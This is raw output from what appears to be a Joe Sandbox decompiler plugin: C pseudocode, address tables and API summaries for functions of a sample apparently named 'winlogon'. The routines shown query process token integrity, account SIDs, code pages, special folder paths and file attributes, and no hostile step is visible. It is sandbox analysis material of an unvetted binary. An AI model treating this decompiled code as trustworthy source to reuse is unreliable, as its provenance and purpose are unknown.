    0x00d733f4
    0x00000000
    0x00d733f9
    0x00000000

    APIs
      • Part of subcall function 00D72F55: GetConsoleMode.KERNEL32(?,?), ref: 00D72FBA
      • Part of subcall function 00D72D35: GetConsoleCP.KERNEL32 ref: 00D72D77
      • Part of subcall function 00D72D35: __Stoull.NTSTC_LIBCMT ref: 00D72DF2
      • Part of subcall function 00D72D35: __Stoull.NTSTC_LIBCMT ref: 00D72E0D
      • Part of subcall function 00D72D35: WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00D72E33
      • Part of subcall function 00D72D35: WriteFile.KERNEL32(?,?,00000000,00D734AA,00000000), ref: 00D72E52
      • Part of subcall function 00D72D35: WriteFile.KERNEL32(?,?,00000001,00D734AA,00000000), ref: 00D72E8B
      • Part of subcall function 00D72D35: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00D734AA,?,?,?,?,?,?), ref: 00D72ECD
      • Part of subcall function 00D72EE8: GetLastError.KERNEL32(?,?,?,?,?,00D73492,?,?,?,?,?,?,?,?,?,00D86C18), ref: 00D72F44
      • Part of subcall function 00D73198: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,?,?,?,?,00D734F7,?,?,?), ref: 00D7324B
      • Part of subcall function 00D73198: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D73279
      • Part of subcall function 00D73198: GetLastError.KERNEL32(?,00D734F7,?,?,?,?,?,?,?,?,?,?,00D86C18,00000014,00D6EC96,00000000), ref: 00D732AA
      • Part of subcall function 00D730AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D73154
      • Part of subcall function 00D730AA: GetLastError.KERNEL32(?,00D734E7,?,?,?,?,?,?,?,?,?,?,00D86C18,00000014,00D6EC96,00000000), ref: 00D7317D
      • Part of subcall function 00D72FCB: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D73066
      • Part of subcall function 00D72FCB: GetLastError.KERNEL32(?,00D73507,?,?,?,?,?,?,?,?,?,?,00D86C18,00000014,00D6EC96,00000000), ref: 00D7308F
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D73522
    • GetLastError.KERNEL32(?,?,?,?,?), ref: 00D7352C
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D62EB0, Relevance: 3.2, APIs: 2, Instructions: 176
    C-Code - Quality: 86%
    			E00D62EB0(void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v532;
				char _v1052;
				void* _v1056;
				signed int _v1060;
				signed int _t25;
				void* _t27;
				signed int _t30;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t47;
				signed int _t48;
				signed int _t51;
				signed int _t52;
				signed int* _t59;
				signed int _t65;
				intOrPtr* _t68;
				intOrPtr* _t72;
				signed int _t77;
				int _t80;
				signed int _t83;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t101;
				signed int _t103;
				void* _t104;
				void* _t110;
				signed int* _t117;
				void* _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t25 =  *0xd88004; // 0x276b9783
				_v8 = _t25 ^ _t120;
				_push(0xdeefbad7);
				_t117 = __edx;
				_t59 = __ecx;
				_t27 = E00D61A30(0, __edx);
				_t122 = _t121 + 0xc;
				if(_t27 != 0) {
					_v1056 = 0xffffffff;
					_t91 = GetCurrentProcess();
					_push(0xdeefbad7);
					_push( &_v1056);
					_t30 = E00D61A30(0, _t91);
					_t123 = _t122 + 0x10;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L1;
					} else {
						_t34 = OpenProcessToken(_t91, 8,  &_v1056);
						__eflags = _t34;
						if(_t34 == 0) {
							goto L1;
						} else {
							_t63 = _v1056;
							__eflags = _v1056;
							if(_v1056 == 0) {
								goto L1;
							} else {
								_v1060 = 0;
								_t35 = E00D62820(_t63,  &_v1060); // executed
								__eflags = _t35;
								if(_t35 == 0) {
									goto L1;
								} else {
									_push(__edi);
									E00D6D520(__edi,  &_v1052, 0, 0x414);
									_t124 = _t123 + 0xc; // executed
									_t38 = E00D62650(_v1060,  &_v1052, __eflags); // executed
									_t65 = _v1060;
									_t101 = _t38;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = _t65 - 0xffffffff;
										if(_t65 != 0xffffffff) {
											__eflags = _t65 - 0xcccccccc;
											if(_t65 != 0xcccccccc) {
												E00D7009A(_t65);
												_t124 = _t124 + 4;
											}
										}
									}
									__eflags = _t101;
									if(_t101 == 0) {
										L32:
										__eflags = _v8 ^ _t120;
										return E00D6ABE4(_v8 ^ _t120);
									} else {
										_t68 =  &_v1052;
										_t94 = _t68 + 2;
										do {
											_t41 =  *_t68;
											_t68 = _t68 + 2;
											__eflags = _t41;
										} while (_t41 != 0);
										__eflags = (_t68 - _t94 >> 1) + 0x10;
										_t42 = E00D68B60((_t68 - _t94 >> 1) + 0x10, (_t68 - _t94 >> 1) + 0x10);
										_t72 =  &_v532;
										 *_t117 = _t42;
										_t95 = _t72 + 2;
										do {
											_t43 =  *_t72;
											_t72 = _t72 + 2;
											__eflags = _t43;
										} while (__eflags != 0);
										_t44 = E00D68B60((_t72 - _t95 >> 1) + 0x10, __eflags);
										 *_t59 = _t44;
										_t103 =  *_t117;
										__eflags = _t103;
										if(_t103 == 0) {
											L26:
											__eflags = _t117 - 0xffffffff;
											if(_t117 != 0xffffffff) {
												__eflags = _t117 - 0xcccccccc;
												if(_t117 != 0xcccccccc) {
													E00D7009A(_t117);
													_t124 = _t124 + 4;
												}
											}
											__eflags = _t59 - 0xffffffff;
											if(_t59 != 0xffffffff) {
												__eflags = _t59 - 0xcccccccc;
												if(_t59 != 0xcccccccc) {
													E00D7009A(_t59);
												}
											}
											goto L32;
										} else {
											__eflags = _t44;
											if(_t44 == 0) {
												goto L26;
											} else {
												_t96 =  &_v1052;
												_t118 = _t96;
												do {
													_t47 =  *_t96;
													_t96 = _t96 + 2;
													__eflags = _t47;
												} while (_t47 != 0);
												_t97 = _t96 - _t118;
												_t104 = _t103 + 0xfffffffe;
												__eflags = _t104;
												do {
													_t48 =  *(_t104 + 2);
													_t104 = _t104 + 2;
													__eflags = _t48;
												} while (_t48 != 0);
												_t77 = _t97 >> 2;
												memcpy(_t104, _t118, _t77 << 2);
												_t98 =  &_v532;
												_t80 = _t97 & 0x00000003;
												__eflags = _t80;
												memcpy(_t118 + _t77 + _t77, _t118, _t80);
												_t119 = _t98;
												do {
													_t51 =  *_t98;
													_t98 = _t98 + 2;
													__eflags = _t51;
												} while (_t51 != 0);
												_t99 = _t98 - _t119;
												_t110 =  *_t59 + 0xfffffffe;
												__eflags = _t110;
												do {
													_t52 =  *(_t110 + 2);
													_t110 = _t110 + 2;
													__eflags = _t52;
												} while (_t52 != 0);
												_t83 = _t99 >> 2;
												memcpy(_t110, _t119, _t83 << 2);
												memcpy(_t119 + _t83 + _t83, _t119, _t99 & 0x00000003);
												__eflags = _v8 ^ _t120;
												return E00D6ABE4(_v8 ^ _t120);
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return E00D6ABE4(_v8 ^ _t120);
				}
			}
















































    0x00d62eb9
    0x00d62ec0
    0x00d62ec5
    0x00d62eca
    0x00d62ecc
    0x00d62ed1
    0x00d62ed6
    0x00d62edb
    0x00d62eef
    0x00d62eff
    0x00d62f07
    0x00d62f0c
    0x00d62f10
    0x00d62f15
    0x00d62f18
    0x00d62f1a
    0x00000000
    0x00d62f1c
    0x00d62f26
    0x00d62f2c
    0x00d62f2e
    0x00000000
    0x00d62f30
    0x00d62f30
    0x00d62f36
    0x00d62f38
    0x00000000
    0x00d62f3a
    0x00d62f40
    0x00d62f4a
    0x00d62f4f
    0x00d62f51
    0x00000000
    0x00d62f53
    0x00d62f53
    0x00d62f62
    0x00d62f73
    0x00d62f76
    0x00d62f7b
    0x00d62f81
    0x00d62f83
    0x00d62f85
    0x00d62f87
    0x00d62f8a
    0x00d62f8c
    0x00d62f92
    0x00d62f95
    0x00d62f9a
    0x00d62f9a
    0x00d62f92
    0x00d62f8a
    0x00d62f9d
    0x00d62f9f
    0x00d630ac
    0x00d630b3
    0x00d630be
    0x00d62fa5
    0x00d62fa5
    0x00d62fab
    0x00d62fb0
    0x00d62fb0
    0x00d62fb3
    0x00d62fb6
    0x00d62fb6
    0x00d62fbf
    0x00d62fc2
    0x00d62fc7
    0x00d62fcd
    0x00d62fcf
    0x00d62fd2
    0x00d62fd2
    0x00d62fd5
    0x00d62fd8
    0x00d62fd8
    0x00d62fe4
    0x00d62fe9
    0x00d62feb
    0x00d62fed
    0x00d62fef
    0x00d63080
    0x00d63080
    0x00d63083
    0x00d63085
    0x00d6308b
    0x00d6308e
    0x00d63093
    0x00d63093
    0x00d6308b
    0x00d63096
    0x00d63099
    0x00d6309b
    0x00d630a1
    0x00d630a4
    0x00d630a9
    0x00d630a1
    0x00000000
    0x00d62ff5
    0x00d62ff5
    0x00d62ff7
    0x00000000
    0x00d62ffd
    0x00d62ffd
    0x00d63003
    0x00d63005
    0x00d63005
    0x00d63008
    0x00d6300b
    0x00d6300b
    0x00d63010
    0x00d63012
    0x00d63012
    0x00d63015
    0x00d63015
    0x00d63019
    0x00d6301c
    0x00d6301c
    0x00d63023
    0x00d63026
    0x00d6302a
    0x00d63030
    0x00d63030
    0x00d63033
    0x00d63035
    0x00d63037
    0x00d63037
    0x00d6303a
    0x00d6303d
    0x00d6303d
    0x00d63044
    0x00d63046
    0x00d63046
    0x00d63050
    0x00d63050
    0x00d63054
    0x00d63057
    0x00d63057
    0x00d63063
    0x00d63066
    0x00d6306d
    0x00d63075
    0x00d6307f
    0x00d6307f
    0x00d62ff7
    0x00d62fef
    0x00d62f9f
    0x00d62f51
    0x00d62f38
    0x00d62f2e
    0x00d62ede
    0x00d62ede
    0x00d62eee
    0x00d62eee

    APIs
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • GetCurrentProcess.KERNEL32 ref: 00D62EF9
    • OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62F26
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00D62873
      • Part of subcall function 00D62820: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?), ref: 00D628A6
      • Part of subcall function 00D62820: IsValidSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628B2
      • Part of subcall function 00D62820: GetLengthSid.ADVAPI32(00000000,?,TokenIntegrityLevel,00000000,00000000,00000000,?), ref: 00D628BE
      • Part of subcall function 00D62820: CopySid.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 00D628DD
      • Part of subcall function 00D62650: LookupAccountSidW.ADVAPI32(00000000,?,?,00000103,?,?,?), ref: 00D626A1
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D76869, Relevance: 3.2, APIs: 2, Instructions: 168
    C-Code - Quality: 92%
    			E00D76869(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0xd88004; // 0x276b9783
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E00D7643C(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xd88308)) - _t78;
						if( *((intOrPtr*)(_t51 + 0xd88308)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xd91694 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00D764AF(_t98);
												goto L37;
											}
										} else {
											E00D6D520(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00D763FE( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00D76514(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00D6D520(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xd88318;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0xd88300; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00D763FE(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0xd8830c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00D764AF(_t98);
				}
				L39:
				return E00D6ABE4(_v8 ^ _t99);
			}






























    0x00d76871
    0x00d76878
    0x00d76880
    0x00d76888
    0x00d7688d
    0x00d7689e
    0x00d7689e
    0x00d768a0
    0x00d768a2
    0x00d768a4
    0x00d768a7
    0x00d768a7
    0x00d768ad
    0x00000000
    0x00000000
    0x00d768b3
    0x00d768b4
    0x00d768b7
    0x00d768ba
    0x00d768bf
    0x00000000
    0x00d768c1
    0x00d768c1
    0x00d768c7
    0x00d76995
    0x00d768cd
    0x00d768cd
    0x00d768d3
    0x00000000
    0x00d768d9
    0x00d768dd
    0x00d768e3
    0x00d768e5
    0x00000000
    0x00d768eb
    0x00d768f0
    0x00d768f6
    0x00d768f8
    0x00d76982
    0x00d76988
    0x00000000
    0x00d7698a
    0x00d7698b
    0x00000000
    0x00d7698b
    0x00d768fe
    0x00d76908
    0x00d7690d
    0x00d76915
    0x00d7691b
    0x00d7691c
    0x00d7691f
    0x00d76972
    0x00d76921
    0x00d76921
    0x00d76925
    0x00d76928
    0x00d7692a
    0x00d7692a
    0x00d7692d
    0x00d7692f
    0x00000000
    0x00000000
    0x00d76931
    0x00d76934
    0x00d7693f
    0x00d7693f
    0x00d76941
    0x00000000
    0x00000000
    0x00d76939
    0x00d7693e
    0x00d7693e
    0x00d7693e
    0x00d76943
    0x00d76946
    0x00d76949
    0x00000000
    0x00000000
    0x00000000
    0x00d76949
    0x00d7692a
    0x00d7694b
    0x00d7694b
    0x00d7694e
    0x00d76953
    0x00d76953
    0x00d76956
    0x00d76957
    0x00d76957
    0x00d76957
    0x00d76967
    0x00d7696d
    0x00d7696d
    0x00d76977
    0x00d7697a
    0x00d7697b
    0x00d7697c
    0x00d76a40
    0x00d76a41
    0x00d76a46
    0x00d76a47
    0x00d76a47
    0x00d768f8
    0x00d768e5
    0x00d768d3
    0x00d768c7
    0x00000000
    0x00d76a49
    0x00d769a7
    0x00d769af
    0x00d769af
    0x00d769b3
    0x00d769b6
    0x00d769bc
    0x00d769bf
    0x00d769bf
    0x00d769c2
    0x00d769c4
    0x00d769c6
    0x00d769c6
    0x00d769c9
    0x00d769cb
    0x00000000
    0x00000000
    0x00d769cd
    0x00d769d0
    0x00d769ec
    0x00d769ec
    0x00d769ee
    0x00000000
    0x00000000
    0x00d769d5
    0x00d769db
    0x00d769dd
    0x00d769e3
    0x00d769e7
    0x00d769e7
    0x00d769e8
    0x00000000
    0x00d769e8
    0x00000000
    0x00d769db
    0x00d769f0
    0x00d769f3
    0x00d769f6
    0x00000000
    0x00000000
    0x00000000
    0x00d769f6
    0x00d769f8
    0x00d769f8
    0x00d769fb
    0x00d769fc
    0x00d769ff
    0x00d76a02
    0x00d76a02
    0x00d76a08
    0x00d76a0b
    0x00d76a1a
    0x00d76a23
    0x00d76a28
    0x00d76a2e
    0x00d76a2f
    0x00d76a2f
    0x00d76a32
    0x00d76a35
    0x00d76a38
    0x00d76a3b
    0x00d76a3b
    0x00d76a3b
    0x00000000
    0x00d7688f
    0x00d76890
    0x00d76896
    0x00d76a4a
    0x00d76a59

    APIs
      • Part of subcall function 00D7643C: GetOEMCP.KERNEL32(00000000), ref: 00D76467
      • Part of subcall function 00D7643C: GetACP.KERNEL32(00000000), ref: 00D7647E
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D7670A,?,00000000), ref: 00D768DD
    • GetCPInfo.KERNEL32(00000000,00D7670A,?,?,?,00D7670A,?,00000000), ref: 00D768F0
      • Part of subcall function 00D76514: GetCPInfo.KERNEL32(?,?), ref: 00D76539
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D642C0, Relevance: 3.1, APIs: 2, Instructions: 90
    C-Code - Quality: 53%
    			E00D642C0(int* __ecx, int __edx, void* __edi) {
				void* _v8;
				void* __esi;
				int _t9;
				int _t10;
				int _t12;
				intOrPtr _t13;
				int _t14;
				int _t15;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				signed int _t33;
				int _t36;
				void* _t39;
				void* _t40;
				signed int _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t50;
				int _t51;
				void* _t54;

				_push(__ecx);
				_t21 = __ecx;
				if(__ecx != 0) {
					_push(_t50);
					__eflags = __edx;
					if(__edx == 0) {
						_push(0x410);
						_t9 = E00D702C9(__ecx);
						_t51 = _t9;
						__eflags = _t51;
						if(_t51 != 0) {
							_t9 = E00D6D520(__edi, _t51, 0, 0x410);
						}
						 *_t21 = _t51;
						__imp__SHGetSpecialFolderPathW(0, _t51, 0x2e, 1);
						return _t9;
					} else {
						_v8 = 0;
						_t10 = E00D643A0( &_v8, __edi, _t50); // executed
						__eflags = _t10;
						if(_t10 == 0) {
							L7:
							__eflags = 0;
							return 0;
						} else {
							_t28 = _v8;
							_t4 = _t28 + 2; // 0x2
							_t39 = _t4;
							do {
								_t12 =  *_t28;
								_t28 = _t28 + 2;
								__eflags = _t12;
							} while (_t12 != 0);
							_t29 = _t28 - _t39;
							__eflags = _t29;
							_t30 = _t29 >> 1;
							if(_t29 != 0) {
								_push(__edi);
								__eflags = _t30 + 0x10;
								_t13 = E00D68B60(_t30 + 0x10, _t30 + 0x10);
								_t40 = _v8;
								_t43 = _t13;
								 *((intOrPtr*)(__ecx)) = _t43;
								_t54 = _t40;
								do {
									_t14 =  *_t40;
									_t40 = _t40 + 2;
									__eflags = _t14;
								} while (_t14 != 0);
								_t41 = _t40 - _t54;
								_t44 = _t43 + 0xfffffffe;
								__eflags = _t44;
								do {
									_t15 =  *(_t44 + 2);
									_t44 = _t44 + 2;
									__eflags = _t15;
								} while (_t15 != 0);
								_t33 = _t41 >> 2;
								memcpy(_t44, _t54, _t33 << 2);
								_t36 = _t41 & 0x00000003;
								__eflags = _t36;
								memcpy(_t54 + _t33 + _t33, _t54, _t36);
								__imp__CoTaskMemFree(_v8);
								return 1;
							} else {
								goto L7;
							}
						}
					}
				} else {
					return 0;
				}
			}
























    0x00d642c3
    0x00d642c5
    0x00d642c9
    0x00d642d2
    0x00d642d3
    0x00d642d5
    0x00d6435f
    0x00d64364
    0x00d64369
    0x00d6436e
    0x00d64370
    0x00d6437a
    0x00d6437f
    0x00d64389
    0x00d6438b
    0x00d64396
    0x00d642db
    0x00d642de
    0x00d642e5
    0x00d642ea
    0x00d642ec
    0x00d64305
    0x00d64306
    0x00d6430c
    0x00d642ee
    0x00d642ee
    0x00d642f1
    0x00d642f1
    0x00d642f4
    0x00d642f4
    0x00d642f7
    0x00d642fa
    0x00d642fa
    0x00d642ff
    0x00d642ff
    0x00d64301
    0x00d64303
    0x00d6430d
    0x00d6430e
    0x00d64311
    0x00d64316
    0x00d64319
    0x00d6431b
    0x00d6431d
    0x00d64320
    0x00d64320
    0x00d64323
    0x00d64326
    0x00d64326
    0x00d6432b
    0x00d6432d
    0x00d6432d
    0x00d64330
    0x00d64330
    0x00d64334
    0x00d64337
    0x00d64337
    0x00d6433e
    0x00d64341
    0x00d64345
    0x00d64345
    0x00d64348
    0x00d6434d
    0x00d6435e
    0x00000000
    0x00000000
    0x00000000
    0x00d64303
    0x00d642ec
    0x00d642cb
    0x00d642d1
    0x00d642d1

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002E,00000001), ref: 00D6438B
      • Part of subcall function 00D643A0: GetVersionExW.KERNEL32(00000114), ref: 00D643F2
      • Part of subcall function 00D643A0: LoadLibraryW.KERNEL32(shell32.dll), ref: 00D6440A
      • Part of subcall function 00D643A0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00D6441A
      • Part of subcall function 00D643A0: SHGetKnownFolderPath.SHELL32(00D7F2E0,00000000,00000000,?), ref: 00D6442E
    • CoTaskMemFree.OLE32(00000000), ref: 00D6434D
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D654E0, Relevance: 3.1, APIs: 2, Instructions: 80
    C-Code - Quality: 56%
    			E00D654E0(long __ecx, intOrPtr __edx, void* __edi, CHAR* _a4, CHAR* _a8, intOrPtr _a16) {
				char _v8;
				char _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				long _v28;
				long* _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				CHAR* _v60;
				CHAR* _v64;
				char _v68;
				char _v124;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t32;
				long _t35;
				void* _t36;
				intOrPtr _t46;
				CHAR* _t60;
				signed int _t61;
				void* _t62;
				void* _t63;

				_push(0xffffffff);
				_push(E00D7E360);
				_push( *[fs:0x0]);
				_t63 = _t62 - 0x6c;
				_t32 =  *0xd88004; // 0x276b9783
				_push(_t32 ^ _t61);
				 *[fs:0x0] =  &_v16;
				_t46 = __edx;
				_t35 = __ecx;
				_v20 = __ecx;
				if(__ecx != 0 && __edx != 0) {
					_t60 = _a8;
					if(_t60 != 0) {
						_t35 = GetFileAttributesA(_a4); // executed
						if(_t35 != 0xffffffff) {
							_t35 = GetFileAttributesA(_t60); // executed
							if(_t35 != 0xffffffff) {
								_v28 = 0;
								_v24 = 0;
								_v8 = 0;
								_t36 = E00D61EC0(_t46,  &_v28, __edi, _t60, _t60); // executed
								if(_t36 != 0) {
									_v64 = _t60;
									_v32 =  &_v28;
									_v52 = _a16;
									_v60 = _a4;
									_push( &_v68);
									_t63 = _t63 - 0xc;
									_v68 = _t46;
									_v56 = 1;
									_v48 = 0x3e8;
									_v44 = 0x7d0;
									_v40 = 0;
									_v36 = 1;
									E00D67810( &_v124);
									_v8 = 1;
									E00D67600( &_v124, _v20);
									E00D67680( &_v124); // executed
									E00D67790( &_v124);
								}
								_t35 = _v28;
								if(_t35 != 0) {
									_t35 = E00D7009A(_t35);
								}
							}
						}
					}
				}
				 *[fs:0x0] = _v16;
				return _t35;
			}






























    0x00d654e3
    0x00d654e5
    0x00d654f0
    0x00d654f1
    0x00d654f6
    0x00d654fd
    0x00d65501
    0x00d65507
    0x00d65509
    0x00d6550b
    0x00d65510
    0x00d6551e
    0x00d65523
    0x00d6552c
    0x00d65535
    0x00d6553c
    0x00d65545
    0x00d6554b
    0x00d65552
    0x00d6555d
    0x00d65564
    0x00d6556b
    0x00d65570
    0x00d65573
    0x00d6557c
    0x00d65582
    0x00d65588
    0x00d65589
    0x00d6558c
    0x00d6558f
    0x00d65596
    0x00d6559d
    0x00d655a4
    0x00d655ab
    0x00d655b2
    0x00d655bd
    0x00d655c1
    0x00d655c9
    0x00d655d1
    0x00d655d1
    0x00d655d6
    0x00d655db
    0x00d655de
    0x00d655e3
    0x00d655db
    0x00d65545
    0x00d65535
    0x00d65523
    0x00d655e9
    0x00d655f6

    APIs
    • GetFileAttributesA.KERNELBASE(?,276B9783), ref: 00D6552C
    • GetFileAttributesA.KERNELBASE(?), ref: 00D6553C
      • Part of subcall function 00D67810: InitializeCriticalSection.KERNEL32(?,?,?,00D655B7), ref: 00D6782E
